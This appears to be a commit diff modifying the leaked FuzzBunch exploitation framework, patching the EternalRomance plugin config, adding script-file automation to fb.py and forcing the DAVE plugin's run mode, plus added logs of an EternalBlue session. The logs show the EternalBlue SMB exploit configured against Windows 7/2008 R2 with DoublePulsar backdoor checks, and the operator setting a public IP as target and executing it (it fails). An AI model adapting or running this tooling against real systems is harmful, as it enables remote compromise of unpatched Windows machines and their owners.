done

exploits/Eternalromance-1.3.0.0.xml

@@ -328,6 +328,7 @@
           <default>45213</default>
         </parameter>
         <parameter name="CallbackLocalPort" description="Callback port that we will listen on to receive the eggs connection" type="TcpPort" required="false"/>
+        <default>45213</default>
       </paramgroup>
 
       <paramgroup name="Listener" description="The egg will open up a new listening port.">

fb.py

@@ -35,7 +35,6 @@
 FB_CONFIG = os.path.join(FB_DIR, "Fuzzbunch.xml")
 
 from fuzzbunch.edfplugin import EDFPlugin
-#from fuzzbunch.edeplugin import EDEPlugin
 from fuzzbunch.fuzzbunch import Fuzzbunch
 from fuzzbunch.pluginfinder import addplugins, PluginfinderError
 from fuzzbunch import exception
@@ -50,9 +49,9 @@ def do_interactive(fb):
     fb.io.print_warning("Press Ctrl-D to exit")
     code.interact(local=gvars, banner="")
 
-def main(fb):
-    fb.printbanner()
-    # fb.cmdqueue.append("retarget")
+def main(fb,INPUT=None):
+    if INPUT != None:
+        fb.do_script(INPUT)
     while 1:
         try:
             fb.cmdloop()
@@ -81,7 +80,13 @@ def setup_and_run(config, fbdir, logdir):
     fb = Fuzzbunch(config, fbdir, logdir)
     fb.printbanner()
     load_plugins(fb)
-    main(fb)
+    try:
+        sys.argv[1]
+    except IndexError:
+        main(fb)
+    else:
+        f = sys.argv[1]
+        main(fb,f)
 
 if __name__ == "__main__":
     setup_and_run(FB_CONFIG, FB_DIR, LOG_DIR)

fuzzbunch/command.py

@@ -284,12 +284,13 @@ def emptyline(self):
     def default(self, line):
         """Called when command prefix is not recognized."""
         cmd, arg, line = self.parseline(line)
-
         # Check if the current context handles the cmd instead
         try:
             func = self.ctx.lookup_function(cmd)
         except AttributeError:
             self.io.print_error("Unknown syntax: %s" % line)
+        except Exception as e:
+            self.io.print_error("Unknown Error: %s" % e)
         else:
             func(arg)
 
@@ -552,5 +553,6 @@ def do_script(self, input):
 if __name__ == "__main__":
     fb = FbCmd()
     fb.cmdloop()
+    # fb.do_script()
 
 

fuzzbunch/daveplugin.py

@@ -220,7 +220,7 @@ def build_package(self, logDir, archOs, listenPort=None, output_filename=None, g
     Plugin execution routine
 
     """
-    def execute(self, session, consolemode, interactive, scripted, globalvars={}, runMode='', archOs='x86-Windows', listenPort=0):
+    def execute(self, session, consolemode, interactive, scripted, globalvars={}, runMode='FB', archOs='x86-Windows', listenPort=0):
         self.lastsession = session
         baseDir, logDir = session.get_dirs()
         waitmode, newconsole = self.get_runflags(consolemode, interactive, scripted)
@@ -229,6 +229,9 @@ def execute(self, session, consolemode, interactive, scripted, globalvars={}, ru
         # Save history
         session.history = self.getParameters()
 
+        # by wrfly
+        runMode='FB'
+
         # Prompt for run mode
         if runMode in ("DANE", "DAVE"):
 

logs/Eternalblue-2.2.0.exe-2017-04-18.22.01.29.818000-InConfig.validate.xml

@@ -0,0 +1,46 @@
+<t:config xmlns:t="urn:trch" id="0f38f55b6a88feccfb846d3d10ab4687e652e63e" configversion="2.2.0.0" name="Eternalblue" version="2.2.0" schemaversion="2.1.0">
+<t:inputparameters>
+<t:parameter name="DaveProxyPort" description="DAVE Core/Proxy Hookup connection port" type="TcpPort" format="Scalar" hidden="true" valid="true">
+<t:default>0</t:default>
+<t:value>0</t:value>
+</t:parameter>
+<t:parameter name="NetworkTimeout" description="Timeout for blocking network calls (in seconds). Use -1 for no timeout." type="S16" format="Scalar" valid="true">
+<t:default>60</t:default>
+<t:value>60</t:value>
+</t:parameter>
+<t:parameter name="TargetIp" description="Target IP Address" type="IPv4" format="Scalar" valid="true">
+<t:default>192.168.1.1</t:default>
+<t:value>192.168.1.1</t:value>
+</t:parameter>
+<t:parameter name="TargetPort" description="Port used by the SMB service for exploit connection" type="TcpPort" format="Scalar" valid="true">
+<t:default>445</t:default>
+<t:value>445</t:value>
+</t:parameter>
+<t:parameter name="VerifyTarget" description="Validate the SMB string from target against the target selected before exploitation." type="Boolean" format="Scalar" valid="true">
+<t:default>false</t:default>
+<t:value>false</t:value>
+</t:parameter>
+<t:parameter name="VerifyBackdoor" description="Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts." type="Boolean" format="Scalar" valid="true">
+<t:default>true</t:default>
+<t:value>true</t:value>
+</t:parameter>
+<t:parameter name="MaxExploitAttempts" description="Number of times to attempt the exploit and groom. Disabled for XP/2K3." type="U32" format="Scalar" valid="true">
+<t:default>3</t:default>
+<t:value>3</t:value>
+</t:parameter>
+<t:parameter name="GroomAllocations" description="Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do." type="U32" format="Scalar" valid="true">
+<t:default>12</t:default>
+<t:value>12</t:value>
+</t:parameter>
+<t:parameter name="ShellcodeBuffer" description="Shellcode buffer in hex (hint: use 'F:&lt;FILENAME&gt;' to load from file)" type="Buffer" format="Scalar" hidden="true" required="false"></t:parameter>
+<t:paramchoice name="Target" description="Operating System, Service Pack, and Architecture of target OS">
+<t:default>WIN72K8R2</t:default>
+<t:value>WIN72K8R2</t:value>
+<t:paramgroup name="XP" description="Windows XP 32-Bit All Service Packs"></t:paramgroup>
+<t:paramgroup name="WIN72K8R2" description="Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs"></t:paramgroup>
+</t:paramchoice>
+</t:inputparameters>
+<t:outputparameters>
+<t:parameter name="DoublePulsarPresent" description="Set to true if the DOUBLEPULSAR backdoor was already installed and the exploit did not have to be thrown" type="Boolean" format="Scalar"></t:parameter>
+</t:outputparameters>
+</t:config>

logs/Eternalblue-2.2.0.exe-2017-04-18.22.01.29.908000-InConfig.xml

@@ -0,0 +1,46 @@
+<t:config xmlns:t="urn:trch" id="0f38f55b6a88feccfb846d3d10ab4687e652e63e" configversion="2.2.0.0" name="Eternalblue" version="2.2.0" schemaversion="2.1.0">
+<t:inputparameters>
+<t:parameter name="DaveProxyPort" description="DAVE Core/Proxy Hookup connection port" type="TcpPort" format="Scalar" hidden="true" valid="true">
+<t:default>0</t:default>
+<t:value>0</t:value>
+</t:parameter>
+<t:parameter name="NetworkTimeout" description="Timeout for blocking network calls (in seconds). Use -1 for no timeout." type="S16" format="Scalar" valid="true">
+<t:default>60</t:default>
+<t:value>60</t:value>
+</t:parameter>
+<t:parameter name="TargetIp" description="Target IP Address" type="IPv4" format="Scalar" valid="true">
+<t:default>192.168.1.1</t:default>
+<t:value>192.168.1.1</t:value>
+</t:parameter>
+<t:parameter name="TargetPort" description="Port used by the SMB service for exploit connection" type="TcpPort" format="Scalar" valid="true">
+<t:default>445</t:default>
+<t:value>445</t:value>
+</t:parameter>
+<t:parameter name="VerifyTarget" description="Validate the SMB string from target against the target selected before exploitation." type="Boolean" format="Scalar" valid="true">
+<t:default>false</t:default>
+<t:value>false</t:value>
+</t:parameter>
+<t:parameter name="VerifyBackdoor" description="Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts." type="Boolean" format="Scalar" valid="true">
+<t:default>true</t:default>
+<t:value>true</t:value>
+</t:parameter>
+<t:parameter name="MaxExploitAttempts" description="Number of times to attempt the exploit and groom. Disabled for XP/2K3." type="U32" format="Scalar" valid="true">
+<t:default>3</t:default>
+<t:value>3</t:value>
+</t:parameter>
+<t:parameter name="GroomAllocations" description="Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do." type="U32" format="Scalar" valid="true">
+<t:default>12</t:default>
+<t:value>12</t:value>
+</t:parameter>
+<t:parameter name="ShellcodeBuffer" description="Shellcode buffer in hex (hint: use 'F:&lt;FILENAME&gt;' to load from file)" type="Buffer" format="Scalar" hidden="true" required="false"></t:parameter>
+<t:paramchoice name="Target" description="Operating System, Service Pack, and Architecture of target OS">
+<t:default>WIN72K8R2</t:default>
+<t:value>WIN72K8R2</t:value>
+<t:paramgroup name="XP" description="Windows XP 32-Bit All Service Packs"></t:paramgroup>
+<t:paramgroup name="WIN72K8R2" description="Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs"></t:paramgroup>
+</t:paramchoice>
+</t:inputparameters>
+<t:outputparameters>
+<t:parameter name="DoublePulsarPresent" description="Set to true if the DOUBLEPULSAR backdoor was already installed and the exploit did not have to be thrown" type="Boolean" format="Scalar"></t:parameter>
+</t:outputparameters>
+</t:config>

logs/Eternalblue-2.2.0.exe-2017-04-18.22.01.29.908000.log

@@ -0,0 +1 @@
+[*] Connecting to target for exploitation.

logs/fuzzbunch-2017-04-18.22.01.28.636000.log

@@ -0,0 +1,57 @@
+
+--[ Version 3.5.1
+
+[*] Loading Plugins
+fb > AutoRun off
+[*] Autorun is OFF
+fb > use EternalBlue
+
+[!] Entering Plugin Context :: Eternalblue
+[*] Applying Global Variables
+
+fb Special (Eternalblue) > setg TargetIP 223.5.5.5
+[+] Set TargetIP => 223.5.5.5
+fb Special (Eternalblue) > execute
+
+[!] Preparing to Execute Eternalblue
+
+[*]  Mode :: Delivery mechanism
+
+   *0) FB       Traditional deployment from within FUZZBUNCH
+    1) DANE     Forward deployment via DARINGNEOPHYTE
+
+[+] Run Mode: 0
+
+
+Module: Eternalblue
+===================
+
+Name                  Value                                                 
+----                  -----                                                 
+DaveProxyPort         0                                                     
+NetworkTimeout        60                                                    
+TargetIp              192.168.1.1                                           
+TargetPort            445                                                   
+VerifyTarget          False                                                 
+VerifyBackdoor        True                                                  
+MaxExploitAttempts    3                                                     
+GroomAllocations      12                                                    
+ShellcodeBuffer                                                             
+Target                WIN72K8R2                                             
+
+[*] Executing Plugin
+[!] Plugin failed
+[-] Error: Eternalblue Failed
+[-] Aborting script
+fb Special (Eternalblue) > echo Initializing Fuzzbunch v3.5.1
+[*] Initializing Fuzzbunch v3.5.1
+fb Special (Eternalblue) > echo Adding Global Variables
+[*] Adding Global Variables
+fb Special (Eternalblue) > setg Color True
+[+] Set Color => True
+fb Special (Eternalblue) > setg ShowHiddenParameters False
+[+] Set ShowHiddenParameters => False
+fb Special (Eternalblue) > setg NetworkTimeout 60
+[+] Set NetworkTimeout => 60
+fb Special (Eternalblue) > setg LogDir G:\logs
+[+] Set LogDir => G:\logs